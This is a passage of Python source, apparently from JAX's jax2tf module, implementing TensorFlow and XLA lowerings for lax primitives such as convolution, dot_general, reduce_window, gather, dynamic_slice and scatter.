        preferred_element_type, out_tf_shape)

  dnums_proto = _conv_general_dimension_numbers_proto(dimension_numbers)
  precision_config_proto = _precision_config_proto(precision)
  assert batch_group_count == 1  # TODO(necula): implement batch_group_count

  def gen_conv(lhs, rhs, preferred_element_type: Optional[DType]):
    # Emits one XlaConv with the shared convolution parameters.
    out = tfxla.conv(
        lhs,
        rhs,
        window_strides,
        padding,
        lhs_dilation,
        rhs_dilation,
        dnums_proto,
        feature_group_count=feature_group_count,
        precision_config=precision_config_proto,
        preferred_element_type=preferred_element_type)
    # TODO: implement shape inference for XlaConv
    out.set_shape(out_tf_shape)
    return out

  # Follow the lowering for complex convolutions from
  # lax._conv_general_dilated_translation. We can use the same conversion on all
  # platforms because on XLA:TPU the compiler does the same as a rewrite.
  if np.issubdtype(_in_avals[0].dtype, np.complexfloating):
    if preferred_element_type is not None:
      # Convert complex dtype to types used for real and imaginary parts
      assert np.issubdtype(preferred_element_type, np.complexfloating)
      preferred_float_et = (
          np.float64 if preferred_element_type == np.complex128 else np.float32)
    else:
      preferred_float_et = None
    lhs_real, lhs_imag = tf.math.real(lhs), tf.math.imag(lhs)
    rhs_real, rhs_imag = tf.math.real(rhs), tf.math.imag(rhs)
    # Three real convolutions instead of four (Karatsuba-style):
    # real part = k1 - k3, imaginary part = k1 + k2.
    k1 = gen_conv(_add(lhs_real, lhs_imag), rhs_real, preferred_float_et)
    k2 = gen_conv(lhs_real, tf.math.subtract(rhs_imag, rhs_real),
                  preferred_float_et)
    k3 = gen_conv(lhs_imag, _add(rhs_real, rhs_imag), preferred_float_et)
    return tf.complex(tf.math.subtract(k1, k3), _add(k1, k2))
  else:
    return gen_conv(lhs, rhs, preferred_element_type)
tf_impl_with_avals[lax.conv_general_dilated_p] = _conv_general_dilated
def _dot_general(lhs, rhs, *, dimension_numbers,
                 precision: Optional[Tuple[PrecisionType, PrecisionType]],
                 preferred_element_type: Optional[DType],
                 _in_avals: Sequence[core.AbstractValue],
                 _out_aval: core.AbstractValue):
  """Implementation of lax.dot_general_p in terms of tf.linalg.einsum.

  With XLA enabled, lowers directly to XlaDotGeneral. Otherwise tries
  tf.linalg.matmul for the classic matrix/vector product shapes and falls
  back to a generated einsum spec for everything else.
  """
  (lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
  lhs_ndim, rhs_ndim = len(lhs.shape), len(rhs.shape)
  if _enable_xla:
    dnums_proto = xla_data_pb2.DotDimensionNumbers()
    dnums_proto.lhs_contracting_dimensions.extend(lhs_contracting)
    dnums_proto.rhs_contracting_dimensions.extend(rhs_contracting)
    dnums_proto.lhs_batch_dimensions.extend(lhs_batch)
    dnums_proto.rhs_batch_dimensions.extend(rhs_batch)
    precision_config_proto = _precision_config_proto(precision)
    res = tfxla.dot_general(
        lhs,
        rhs,
        dnums_proto,
        precision_config_proto,
        preferred_element_type=preferred_element_type)
    # TODO: in presence of None dimensions, XlaDot shape inference returns
    # unknown shape.
    res.set_shape(_aval_to_tf_shape(_out_aval))
    return res
  # This condition ensures that:
  # 1) the batch dimensions are ordered in the same way in lhs and rhs (this is
  #    not strictly necessary, but we would have to reshape the array if that
  #    were not the case;
  # 2) lhs and rhs have the same number of dimensions +/- 1
  # 3) the number of non-batch dimensions in both tensors is either 1 or 2
  # 4) the contracting dimensions are consistent with those of a classic
  #    matrix/matrix, vector/matrix or matrix/vector multiplication.
  if (lhs_batch == rhs_batch == tuple(range(len(lhs_batch))) and
      lhs_ndim - rhs_ndim in [-1, 0, 1] and
      1 <= lhs_ndim - len(lhs_batch) <= 2 and
      1 <= rhs_ndim - len(rhs_batch) <= 2 and
      lhs_contracting == (len(lhs.shape) - 1,) and
      rhs_contracting == (len(lhs_batch),)):
    # All the inputs to tf.linalg.matmul must have 2 inner dimensions,
    # after their batch dimensions, so we need to expand the dimensions
    # appropriately. We can get to this branch with three combinations of
    # inner shapes:
    # - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c]
    #   - in this case, the resulting inner shape is [a, c];
    # - lhs.inner_shape == [b]  , rhs.inner_shape == [b, c]
    #   - in this case, we need to expand lhs to [1, b], and the resulting
    #     shape is [c]. We need to squeeze the result of tf.linalg.matmul
    #     as it will have shape [1, c];
    # - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b]
    #   - in this case, we need to expand rhs to [b, 1], and the resulting
    #     shape is [a]. We need to squeeze the result of tf.linalg.matmul
    #     as it will have shape [a, 1];
    # - lhs.shape == [batch] + [b]  , rhs.shape == [batch] + [b]
    #   - in this case, we need to expand lhs to [1, b] and rhs to [b, 1],
    #     and the resulting shape is (). We need to squeeze the result of
    #     tf.linalg.matmul as it will have shape [1, 1].
    squeeze_idxs = []
    if lhs_ndim - len(lhs_batch) == 1:
      lhs = tf.expand_dims(lhs, lhs_ndim - 1)
      squeeze_idxs.append(len(lhs.shape) - 2)
    if rhs_ndim - len(rhs_batch) == 1:
      rhs = tf.expand_dims(rhs, rhs_ndim)
      squeeze_idxs.append(len(rhs.shape) - 1)
    result = tf.linalg.matmul(lhs, rhs)
    if len(squeeze_idxs) != 0:
      assert all([result.shape[i] == 1 for i in squeeze_idxs])
      result = tf.squeeze(result, squeeze_idxs)
    return result

  # General fallback: build an einsum spec with a fresh letter per axis,
  # sharing letters across contracted and batch axes.
  new_id = iter(string.ascii_letters)
  lhs_axis_ids = [next(new_id) for _ in lhs.shape]
  rhs_axis_ids = [next(new_id) for _ in rhs.shape]
  lhs_out_axis_ids = lhs_axis_ids[:]
  rhs_out_axis_ids = rhs_axis_ids[:]
  for lhs_axis, rhs_axis in zip(lhs_contracting, rhs_contracting):
    shared_id = next(new_id)
    lhs_axis_ids[lhs_axis] = shared_id
    rhs_axis_ids[rhs_axis] = shared_id
    lhs_out_axis_ids[lhs_axis] = None  # type: ignore[call-overload]
    rhs_out_axis_ids[rhs_axis] = None  # type: ignore[call-overload]
  batch_ids = []
  for lhs_axis, rhs_axis in zip(lhs_batch, rhs_batch):
    shared_id = next(new_id)
    lhs_axis_ids[lhs_axis] = shared_id
    rhs_axis_ids[rhs_axis] = shared_id
    lhs_out_axis_ids[lhs_axis] = None  # type: ignore[call-overload]
    rhs_out_axis_ids[rhs_axis] = None  # type: ignore[call-overload]
    batch_ids.append(shared_id)
  not_none = lambda x: x is not None
  out_axis_ids = list(
      filter(not_none, batch_ids + lhs_out_axis_ids + rhs_out_axis_ids))
  assert lhs.dtype == rhs.dtype
  spec = "{},{}->{}".format("".join(lhs_axis_ids), "".join(rhs_axis_ids),
                            "".join(out_axis_ids))
  return tf.linalg.einsum(spec, lhs, rhs)
tf_impl_with_avals[lax.dot_general_p] = _dot_general
def _broadcast(operand, *, sizes):
  """Implementation of lax.broadcast_p: prepends `sizes` to the operand's shape."""
  target_shape = tf.TensorShape(sizes).concatenate(operand.shape)
  return tf.broadcast_to(operand, target_shape)
tf_impl[lax.broadcast_p] = _broadcast
def _broadcast_in_dim(operand, *, shape, broadcast_dimensions):
  """Implementation of lax.broadcast_in_dim_p.

  Reshapes the operand to a rank-len(shape) intermediate (size 1 everywhere
  except at the broadcast dimensions) and then broadcasts it to `shape`.
  """
  intermediate = [1] * len(shape)
  for size, out_dim in zip(operand.shape, broadcast_dimensions):
    if size != 1:
      intermediate[out_dim] = shape[out_dim]
  reshaped = tf.reshape(operand, _eval_shape(intermediate))
  return tf.broadcast_to(reshaped, _eval_shape(shape))
tf_impl[lax.broadcast_in_dim_p] = _broadcast_in_dim
def _reshape(operand, *, new_sizes, dimensions):
  """Implementation of lax.reshape_p, optionally permuting dims first."""
  if dimensions is None:
    dimensions = tf.range(tf.rank(operand))
  permuted = tf.transpose(operand, dimensions)
  return tf.reshape(permuted, _eval_shape(new_sizes))
tf_impl[lax.reshape_p] = _reshape
def _squeeze(operand, *, dimensions, _in_avals, _out_aval):
  """Implementation of lax.squeeze_p: drops the size-1 axes in `dimensions`."""
  op_shape = _in_avals[0].shape
  kept_dims = tuple(
      size for axis, size in enumerate(op_shape) if axis not in dimensions)
  return tf.reshape(operand, _eval_shape(kept_dims))
tf_impl_with_avals[lax.squeeze_p] = _squeeze
def _pad(operand, padding_value, *, padding_config,
         _in_avals: Sequence[core.AbstractValue],
         _out_aval: core.AbstractValue):
  """Implementation of lax.pad_p.

  With XLA enabled this lowers to XlaPad, which handles negative and interior
  padding. Without XLA, only non-negative non-interior padding is expressible
  (via tf.pad in CONSTANT mode).
  """
  del _in_avals
  low, high, interior = util.unzip3(padding_config)
  if _enable_xla:
    return tfxla.pad(operand, padding_value, low, high, interior)
  if all(lo >= 0 and hi >= 0 and i == 0 for lo, hi, i in padding_config):
    return tf.pad(
        operand,
        util.safe_zip(low, high),
        mode="CONSTANT",
        constant_values=padding_value)
  raise _xla_disabled_error(
      "pad",
      "Only use cases without interior or negative padding can be converted without XLA."
  )
tf_impl_with_avals[lax.pad_p] = _pad
def _rev(operand, *, dimensions):
  """Implementation of lax.rev_p via tf.reverse."""
  return tf.reverse(operand, axis=dimensions)
tf_impl[lax.rev_p] = _rev
# lax.select_p maps directly onto tf.where(cond, x, y).
tf_impl[lax.select_p] = tf.where
def _transpose(operand, *, permutation):
  """Implementation of lax.transpose_p via tf.transpose."""
  axes = permutation
  return tf.transpose(operand, perm=axes)
tf_impl[lax.transpose_p] = _transpose
# Adapter: JAX reducers pass an `axes` argument while tf.reduce_* expect `axis`.
axes_to_axis = lambda func: lambda operand, axes: func(operand, axis=axes)
# sum/prod/max/min go through bool_to_int8 because the TF reducers do not
# accept tf.bool operands.
tf_impl[lax.reduce_sum_p] = (
    bool_to_int8(axes_to_axis(tf.reduce_sum), argnums=0))
tf_impl[lax.reduce_prod_p] = (
    bool_to_int8(axes_to_axis(tf.reduce_prod), argnums=0))
tf_impl[lax.reduce_max_p] = (
    bool_to_int8(axes_to_axis(tf.reduce_max), argnums=0))
tf_impl[lax.reduce_min_p] = (
    bool_to_int8(axes_to_axis(tf.reduce_min), argnums=0))
tf_impl[lax.reduce_or_p] = axes_to_axis(tf.reduce_any)
tf_impl[lax.reduce_and_p] = axes_to_axis(tf.reduce_all)
def _argminmax(fn, operand, axes, index_dtype):
  """Shared implementation of lax.argmin_p and lax.argmax_p.

  `fn` is tf.math.argmin or tf.math.argmax; the result is computed with the
  narrowest supported TF output type and then cast to `index_dtype`.
  """
  axis, = axes
  # TF only offers int32/int64 index outputs; pick the smaller one that fits.
  needs_64 = dtypes.iinfo(index_dtype).bits > 32
  output_type = tf.int64 if needs_64 else tf.int32
  # TODO(phawkins): handle axes larger than 2^31.
  raw = fn(operand, axis=axis, output_type=output_type)
  return tf.cast(raw, to_tf_dtype(index_dtype))
tf_impl[lax.argmin_p] = functools.partial(_argminmax, tf.math.argmin)
tf_impl[lax.argmax_p] = functools.partial(_argminmax, tf.math.argmax)
# Pre-built tf.functions, reused where XLA ops require concrete reducer fns.
_add_fn = tf.function(_add, autograph=False)
_ge_fn = tf.function(tf.math.greater_equal, autograph=False)
def _select_and_gather_add(
    tangents: TfVal, operand: TfVal, select_prim: core.Primitive,
    window_dimensions: Sequence[int], window_strides: Sequence[int],
    base_dilation: Sequence[int], window_dilation: Sequence[int],
    padding: Sequence[Tuple[int, int]], _in_avals: Sequence[core.AbstractValue],
    _out_aval: core.AbstractValue):
  """Implementation of lax.select_and_gather_add_p.

  Packs each (operand, tangent) element pair into one double-width unsigned
  integer, runs a single reduce_window whose comparison looks only at the
  operand half, and unpacks the tangent half of the winning element.
  """
  # Note: this function follows the pattern in
  # jax.lax._select_and_gather_add_translation.
  dtype = operand.dtype
  nbits = dtypes.finfo(dtype.as_numpy_dtype).bits

  # Specializing the function for 64 bits. Only up to 32 bits are supported on TPU,
  # we thus intend to let the code throw a different exception on this platform.
  max_bits = 64

  assert nbits <= max_bits
  double_word_reduction = nbits * 2 <= max_bits

  const = lambda dtype, x: tf.constant(np.array(x), dtype)

  if double_word_reduction:
    word_dtype = lax._UINT_DTYPES[nbits]
    double_word_dtype = lax._UINT_DTYPES[nbits * 2]

    # Packs two values into a tuple: operand bits in the high word, tangent
    # bits in the low word.
    def pack(a, b):
      a = _bitcast_convert_type(a, word_dtype)
      b = _bitcast_convert_type(b, word_dtype)
      a = _convert_element_type(a, new_dtype=double_word_dtype)
      b = _convert_element_type(b, new_dtype=double_word_dtype)
      a = tf.bitwise.left_shift(a, const(double_word_dtype, nbits))
      return tf.bitwise.bitwise_or(a, b)

    # Unpacks the first element of a tuple (the high word).
    def fst(t):
      assert t.dtype == double_word_dtype
      st = _shift_right_logical(t, const(double_word_dtype, nbits))
      return _bitcast_convert_type(
          _convert_element_type(st, new_dtype=word_dtype), dtype)

    # Unpacks the second element of a tuple (the low word).
    def snd(t):
      return _bitcast_convert_type(
          _convert_element_type(t, new_dtype=word_dtype), dtype)

  else:
    raise NotImplementedError(
        f"TODO: need to pack {nbits * 2} bits but this platform can only go up to {max_bits} bits."
    )

  assert select_prim is lax.ge_p or select_prim is lax.le_p, select_prim

  def reducer(x, y):
    # Selects the packed pair whose operand half wins the comparison.
    which = tf_impl[select_prim]
    return tf_impl[lax.select_p](which(fst(x), fst(y)), x=x, y=y)

  # The identity for a max (ge) selection is -inf; for a min (le) it is +inf.
  init = -np.inf if select_prim is lax.ge_p else np.inf
  init_identity = lambda x: pack(const(dtype, init), const(dtype, 0))

  out = _specialized_reduce_window(
      reducer,
      init_identity,
      pack(operand, tangents),
      window_dimensions=window_dimensions,
      window_strides=window_strides,
      padding=padding,
      base_dilation=base_dilation,
      window_dilation=window_dilation,
      _in_avals=_in_avals,
      _out_aval=_out_aval)

  return snd(out)
tf_impl_with_avals[lax.select_and_gather_add_p] = _select_and_gather_add
def _get_shape_from_tensor_or_array(x):
  """Returns x.shape as a tuple, for tf.Tensor or ndarray-like inputs."""
  shape = x.shape
  if isinstance(shape, tf.TensorShape):
    shape = shape.as_list()
  return tuple(shape)
def _common_reduce_window(operand, init_val, reducer, window_dimensions,
                          window_strides, padding, base_dilation,
                          window_dilation, _in_avals, _out_aval):
  """Shared lowering of the reduce_window variants to tfxla.reduce_window.

  `reducer` is a binary scalar function; it is traced into a concrete
  tf.function so it can be handed to the XlaReduceWindow op. A non-tensor
  `init_val` is first turned into a constant of the operand's dtype.
  """
  o_spec = tf.TensorSpec((), dtype=operand.dtype)
  reducer_fn = tf.function(
      reducer, autograph=False).get_concrete_function(o_spec, o_spec)
  if not isinstance(init_val, tf.Tensor):
    assert not config.jax_enable_checks or _is_tfval(
        init_val), f"Non TfVal: {init_val}"
    init_val = tf.constant(init_val, operand.dtype)
  out = tfxla.reduce_window(
      operand,
      init_val,
      reducer_fn,
      window_dimensions,
      window_strides,
      base_dilations=base_dilation,
      window_dilations=window_dilation,
      padding=padding)
  # TODO: implement shape inference for XlaReduceWindow
  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
def _reduce_window(operand, init_value, *, jaxpr, consts, window_dimensions,
                   window_strides, padding, base_dilation, window_dilation,
                   _in_avals, _out_aval):
  """TensorFlow implementation of reduce_window.

  Args:
    operand: N dimensional array containing elements of type T
    init_value: starting value of the reduction
    jaxpr: the jaxpr corresponding to the reduction function
    consts: the constants associated with jaxpr.
    window_dimensions: array of integers for window dimension values
    window_strides: array of integers for window stride values
    padding: array of pairs of integers for padding values
    base_dilation: array of integers for base dilation values
    window_dilation: array of integers for window dilation values

  Returns:
    The reduced operand.

  Raises:
    the _xla_disabled_error when XLA ops are disabled (there is no non-XLA
    path for a general reducer).
  """
  assert len(consts) == 0, "Reduction computation cannot have constants"

  if not _enable_xla:
    raise _xla_disabled_error("reduce_window")

  def reducer(arg1: TfVal, arg2: TfVal) -> TfVal:
    # Interprets the user's reduction jaxpr on a pair of scalars.
    closed_jaxpr = core.ClosedJaxpr(jaxpr, consts)
    res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
    return res

  return _common_reduce_window(operand, init_value, reducer, window_dimensions,
                               window_strides, padding, base_dilation,
                               window_dilation, _in_avals, _out_aval)
# _try_tf_pool currently only supports reduce_window_max and reduce_window_sum.
# TODO(bchetioui): this function is not exhaustive wrt which
# reduce_window_max or reduce_window_sum cases can be translated into a call to
# max_pool or avg_pool. Further investigation is needed to fully flesh it out.
def _try_tf_pool(op_name, operand, window_dimensions, window_strides, padding,
                 base_dilation, window_dilation) -> TfVal:
  """Attempts to convert reduce_window_max / reduce_window_sum without XLA.

  Expresses the reduction as tf.nn.max_pool / tf.nn.avg_pool when the window
  configuration allows it; every unsupported configuration raises the
  exception built by `error` below.
  """

  def error(msg):
    # Builds (does not raise) the "XLA disabled" exception with a uniform hint.
    suffix = ("See source code for the precise conditions under which "
              "reduce_window can be converted without XLA.")
    return _xla_disabled_error("reduce_window", f"{msg} - {suffix}")

  dtype = operand.dtype
  # Contrarily to the main path, tf.int8 is actually a valid type for
  # tf.nn.max_pool.
  if op_name == "reduce_window_max" and dtype in [
      tf.bool, tf.uint32, tf.uint64, tf.complex64, tf.complex128
  ]:
    raise error(f"tf.nn.max_pool does not support operands of type {dtype}")
  if op_name == "reduce_window_sum" and operand.dtype not in [
      tf.float16, tf.float32, tf.float64
  ]:
    raise error(f"tf.nn.avg_pool does not support operands of type {dtype}")
  # Size-1 window entries at the ends are taken to mean the operand already
  # carries batch / channel dimensions.
  has_batch_dim = window_dimensions[0] == 1
  has_channel_dim = window_dimensions[-1] == 1
  nb_spatial_dimensions = len(operand.shape) - has_batch_dim - has_channel_dim
  if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
    raise error("TensorFlow can only handle pooling for arrays with 1, 2, or "
                "3 spatial dimensions")
  # TODO(bchetioui): does a simple conversion with another base dilation exist?
  if list(base_dilation) != [1] * len(operand.shape):
    raise error("Unimplemented support for base dilation")
  # TODO(bchetioui): does a simple conversion with another window_dilation
  # exist? The whole story seems similar to convolution.
  if list(window_dilation) != [1] * len(operand.shape):
    raise error("Unimplemented support for window dilation")
  if list(padding) != [(0, 0)] * len(operand.shape):
    raise error("Unimplemented support for padding")
  # ReduceWindow in XLA takes an array of rank N as a parameter, but
  # tf.nn.max_pool / tf.nn.avg_pool take an array of rank N+2, with a default
  # shape of the form [batch_size] + input_spatial_shape + [num_channels]
  tf_operand = operand
  tf_window_dimensions = list(window_dimensions)
  tf_window_strides = list(window_strides)
  if not has_batch_dim:
    tf_operand = tf.expand_dims(tf_operand, 0)
    tf_window_dimensions = [1] + tf_window_dimensions
    tf_window_strides = [1] + tf_window_strides
  if not has_channel_dim:
    tf_operand = tf.expand_dims(tf_operand, -1)
    tf_window_dimensions.append(1)
    tf_window_strides.append(1)
  tf_data_format = "N" + "DHW"[-nb_spatial_dimensions:] + "C"
  tf_padding = "VALID"
  if op_name == "reduce_window_max":
    result = tf.nn.max_pool(tf_operand, tf_window_dimensions, tf_window_strides,
                            tf_padding, tf_data_format)
  elif op_name == "reduce_window_sum":
    # avg_pool * window size recovers the windowed sum.
    avg = tf.nn.avg_pool(tf_operand, tf_window_dimensions, tf_window_strides,
                         tf_padding, tf_data_format)
    result = avg * np.prod(tf_window_dimensions)
  else:
    raise error(f"Unimplemented support for {op_name}")
  # Remove the dimensions we added above before returning.
  if not has_batch_dim:
    result = tf.squeeze(result, 0)
  if not has_channel_dim:
    result = tf.squeeze(result, -1)
  return result
def _specialized_reduce_window(reducer,
                               identity,
                               operand,
                               *,
                               window_dimensions,
                               window_strides,
                               padding,
                               base_dilation,
                               window_dilation,
                               _in_avals,
                               _out_aval,
                               name=None):
  """Wraps the TensorFlow reduce window operation based on a reducer and an
  identity function defining the initial value of the reduction depending on
  the dtype of the operand.

  Args:
    reducer: reduction function of type TfVal -> TfVal -> TfVal
    identity: function that takes a TensorFlow dtype as a parameter and returns
      the starting value of the reduction.
    operand: N dimensional array containing elements of type T
    window_dimensions: array of integers for window dimension values
    window_strides: array of integers for window stride values
    padding: array of pairs of integers for padding values
    base_dilation: array of integers for base dilation values
    window_dilation: array of integers for window dilation values
    name: the name of the specialized reduce window primitive for which this
      conversion function is called. This information may help to choose a
      different conversion path (optional)

  Returns:
    The reduced operand.
  """
  # Without XLA, max and sum reductions may still be expressible as pooling.
  if not _enable_xla and name in ["reduce_window_max", "reduce_window_sum"]:
    return _try_tf_pool(name, operand, window_dimensions, window_strides,
                        padding, base_dilation, window_dilation)

  return _common_reduce_window(operand, identity(operand.dtype), reducer,
                               window_dimensions, window_strides, padding,
                               base_dilation, window_dilation, _in_avals,
                               _out_aval)
def _get_max_identity(tf_dtype):
  """Returns the identity element for a max reduction over `tf_dtype`."""
  np_dtype = tf_dtype.as_numpy_dtype
  if tf_dtype == tf.bfloat16 or dtypes.issubdtype(np_dtype, np.inexact):
    return np_dtype(-np.inf)
  if dtypes.issubdtype(np_dtype, np.integer):
    return dtypes.iinfo(np_dtype).min
  # Only booleans remain; their max identity is False.
  assert dtypes.issubdtype(
      np_dtype, np.bool_), (f"{tf_dtype} has no defined max identity")
  return False
def _get_min_identity(tf_dtype):
  """Returns the identity element for a min reduction over `tf_dtype`."""
  np_dtype = tf_dtype.as_numpy_dtype
  if tf_dtype == tf.bfloat16 or dtypes.issubdtype(np_dtype, np.inexact):
    return np_dtype(np.inf)
  if dtypes.issubdtype(np_dtype, np.integer):
    return dtypes.iinfo(np_dtype).max
  # Only booleans remain; their min identity is True.
  assert dtypes.issubdtype(
      np_dtype, np.bool_), (f"{tf_dtype} has no defined min identity")
  return True
# pylint: disable=protected-access
# Specialized reduce_window variants: each gets a reducer plus the identity
# element used for the initial value at the padded edges.
tf_impl_with_avals[lax.reduce_window_sum_p] = (
    functools.partial(
        _specialized_reduce_window, _add, lambda x: 0,
        name="reduce_window_sum"))
tf_impl_with_avals[lax.reduce_window_min_p] = (
    functools.partial(
        _specialized_reduce_window,
        tf.math.minimum,
        _get_min_identity,
        name="reduce_window_min"))
tf_impl_with_avals[lax.reduce_window_max_p] = (
    functools.partial(
        _specialized_reduce_window,
        tf.math.maximum,
        _get_max_identity,
        name="reduce_window_max"))
tf_impl_with_avals[lax.reduce_window_p] = _reduce_window
# pylint: enable=protected-access

# We use lax_control_flow._cumred_tpu_translation_rule to convert cummax,
# cummin, cumsum and cumprod. This is efficient on TPU, but the complexity is
# O(n^2) on other backends. This may be implemented using associative_scan
# instead to favor different backends.
tf_impl_with_avals[lax_control_flow.cummin_p] = _convert_jax_impl(
    functools.partial(lax_control_flow._cumred_tpu_translation_rule,
                      lax._reduce_window_min),
    multiple_results=False)
tf_impl_with_avals[lax_control_flow.cummax_p] = _convert_jax_impl(
    functools.partial(lax_control_flow._cumred_tpu_translation_rule,
                      lax._reduce_window_max),
    multiple_results=False)
# TODO(bchetioui): cumsum and cumprod can be converted using pure TF ops for
# certain dtypes: bfloat16, float16, float32, float64, and int32. Other dtypes
# will fail when running in compiled mode, but are otherwise compatible with
# the operation. A non-XLA path can thus be defined for all dtypes, though the
# tests will crash.
tf_impl_with_avals[lax_control_flow.cumsum_p] = _convert_jax_impl(
    functools.partial(lax_control_flow._cumred_tpu_translation_rule,
                      lax._reduce_window_sum),
    multiple_results=False)
tf_impl_with_avals[lax_control_flow.cumprod_p] = _convert_jax_impl(
    functools.partial(lax_control_flow._cumred_tpu_translation_rule,
                      lax._reduce_window_prod),
    multiple_results=False)
def _select_and_scatter(operand, source, init_value, select_jaxpr,
select_consts, scatter_jaxpr, scatter_consts,
window_dimensions, window_strides, padding):
raise NotImplementedError("TODO: jax2tf can not convert _select_and_scatter")
# Registered so that attempting the conversion raises a clear error.
tf_impl[lax.select_and_scatter_p] = _select_and_scatter
@functools.partial(bool_to_int8, argnums=(0, 1))
def _select_and_scatter_add(source, operand, *, select_prim, window_dimensions,
                            window_strides, padding, _in_avals, _out_aval):
  """Implementation of lax.select_and_scatter_add_p via XlaSelectAndScatter.

  The select and scatter computations are passed as concrete tf.functions;
  the scatter computation is always addition. Raises the XLA-disabled error
  when XLA ops are not enabled (there is no non-XLA path).
  """
  if not _enable_xla:
    raise _xla_disabled_error("select_and_scatter_add")
  init_value = tf.zeros((), operand.dtype)
  select_fn = (
      tf.function(tf_impl[select_prim], autograph=False).get_concrete_function(
          init_value, init_value))
  scatter_fn = _add_fn.get_concrete_function(init_value, init_value)
  out = tfxla.select_and_scatter(operand, window_dimensions, window_strides,
                                 padding, source, init_value, select_fn,
                                 scatter_fn)
  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
tf_impl_with_avals[lax.select_and_scatter_add_p] = _select_and_scatter_add
def _threefry2x32_jax_impl(*args: TfVal, _in_avals, _out_aval):
  """Implementation of the threefry2x32 PRNG primitive.

  Reuses JAX's own lowering (with unrolled loops) and converts it via
  _convert_jax_impl rather than reimplementing the cipher in TF.
  """
  res = _convert_jax_impl(
      functools.partial(
          jax._src.random._threefry2x32_lowering, use_rolled_loops=False),
      multiple_results=True)(
          *args, _in_avals=_in_avals, _out_aval=_out_aval)
  return res
tf_impl_with_avals[jax.random.threefry2x32_p] = _threefry2x32_jax_impl
# Use the vmap implementation, otherwise on TPU the performance is really bad
# With use_vmap=True on, we get about the same performance for JAX and jax2tf.
tf_impl_with_avals[random.random_gamma_p] = _convert_jax_impl(
    functools.partial(jax._src.random._gamma_impl, use_vmap=True),
    multiple_results=False)
def _gather_dimensions_proto(indices_shape, dimension_numbers):
  """Builds an XLA GatherDimensionNumbers proto from lax dimension numbers."""
  proto = xla_data_pb2.GatherDimensionNumbers()
  proto.offset_dims.extend(dimension_numbers.offset_dims)
  proto.collapsed_slice_dims.extend(dimension_numbers.collapsed_slice_dims)
  proto.start_index_map.extend(dimension_numbers.start_index_map)
  assert indices_shape
  # The trailing dimension of the indices holds the index vector.
  proto.index_vector_dim = len(indices_shape) - 1
  return proto
@functools.partial(bool_to_int8, argnums=0)
def _gather(operand, start_indices, *, dimension_numbers, slice_sizes,
            _in_avals, _out_aval):
  """Tensorflow implementation of gather.

  Lowers to XlaGather; raises the XLA-disabled error when XLA ops are not
  enabled. The bool_to_int8 wrapper handles tf.bool operands, which XlaGather
  does not accept.
  """
  del _in_avals
  if not _enable_xla:
    raise _xla_disabled_error("gather")
  proto = _gather_dimensions_proto(start_indices.shape, dimension_numbers)
  slice_sizes_tf = _eval_shape(slice_sizes)
  # The final False disables indices_are_sorted.
  out = tfxla.gather(operand, start_indices, proto, slice_sizes_tf, False)
  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
tf_impl_with_avals[lax.gather_p] = _gather
def _slice(operand, start_indices, limit_indices, strides, _in_avals,
           _out_aval):
  """Implementation of lax.slice_p via __getitem__ with Python slices."""
  if strides is None:
    strides = [1] * len(start_indices)
  starts = _eval_shape(start_indices)
  limits = _eval_shape(limit_indices)
  steps = _eval_shape(strides)
  out = operand[tuple(slice(*bounds) for bounds in zip(starts, limits, steps))]
  # TODO(b/184503314): improve shape inference for __getitem__
  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
tf_impl_with_avals[lax.slice_p] = _slice
def _dynamic_slice(operand, *start_indices, slice_sizes,
                   _in_avals: Sequence[core.ShapedArray],
                   _out_aval: core.ShapedArray):
  """Implements lax.dynamic_slice with the TFXLA dynamic_slice op."""
  # tf.slice (and tf.gather for lax.gather) would sometimes work here, but
  # they have different index-out-of-bounds semantics than JAX/XLA. Forcing
  # compilation via tf.xla.experimental.compile or tf.function(jit_compile=True)
  # proved brittle when nested in an outer compilation (b/162814494,
  # b/163006262) and does not survive being put in a SavedModel, so we use
  # the TFXLA slicing and gather ops instead.
  if not _enable_xla:
    raise _xla_disabled_error("dynamic_slice")
  out = tfxla.dynamic_slice(
      operand, tf.stack(start_indices), size_indices=_eval_shape(slice_sizes))
  # TODO: implement shape inference for XlaDynamicSlice
  out.set_shape(_aval_to_tf_shape(_out_aval))
  return out
tf_impl_with_avals[lax.dynamic_slice_p] = _dynamic_slice
def _scatter_dimensions_proto(indices_shape, dimension_numbers):
  """Converts lax ScatterDimensionNumbers into an XLA proto.

  Args:
    indices_shape: the shape of the scatter_indices operand (non-empty).
    dimension_numbers: a lax.ScatterDimensionNumbers.

  Returns:
    An xla_data_pb2.ScatterDimensionNumbers proto.
  """
  assert indices_shape
  dims = xla_data_pb2.ScatterDimensionNumbers()
  dims.update_window_dims.extend(dimension_numbers.update_window_dims)
  dims.inserted_window_dims.extend(dimension_numbers.inserted_window_dims)
  dims.scatter_dims_to_operand_dims.extend(
      dimension_numbers.scatter_dims_to_operand_dims)
  # The trailing dimension of the indices holds the index vector.
  dims.index_vector_dim = len(indices_shape) - 1
  return dims
def _scatter(operand, scatter_indices, updates, *, update_jaxpr, update_consts,
             dimension_numbers, indices_are_sorted, unique_indices,
             _in_avals: Sequence[core.AbstractValue],
             _out_aval: core.AbstractValue):
  """Implements lax scatter primitives using the TFXLA scatter op.

  The update computation (a jaxpr combining two scalars) is traced into a
  concrete TF function and passed to tfxla.scatter.
  """
  del unique_indices, _in_avals
  assert len(update_consts) == 0, "Update computation cannot have constants"
  if not _enable_xla:
    raise _xla_disabled_error("scatter")
  proto = _scatter_dimensions_proto(scatter_indices.shape, dimension_numbers)
  # Scalar combiner applied per scattered element; interprets the jaxpr.
  def update_computation(arg1: TfVal, arg2: TfVal) -> TfVal:
    closed_jaxpr = core.ClosedJaxpr(update_jaxpr, update_consts)
    res, = _interpret_jaxpr(closed_jaxpr, arg1, arg2)
    return res
  # Trace the combiner on two scalars of the operand dtype; tfxla.scatter
  # needs a ConcreteFunction.
  o_spec = tf.TensorSpec((), dtype=operand.dtype)
  xla_update_computation = (
      tf.function(update_computation,
                  autograph=False).get_concrete_function(o_spec, o_spec))
  out = tfxla.scatter(
      operand,
      scatter_indices,
      updates,
      xla_update_computation,
      proto,
      indices_are_sorted=indices_are_sorted)
  # TODO: implement shape analysis for XlaScatter
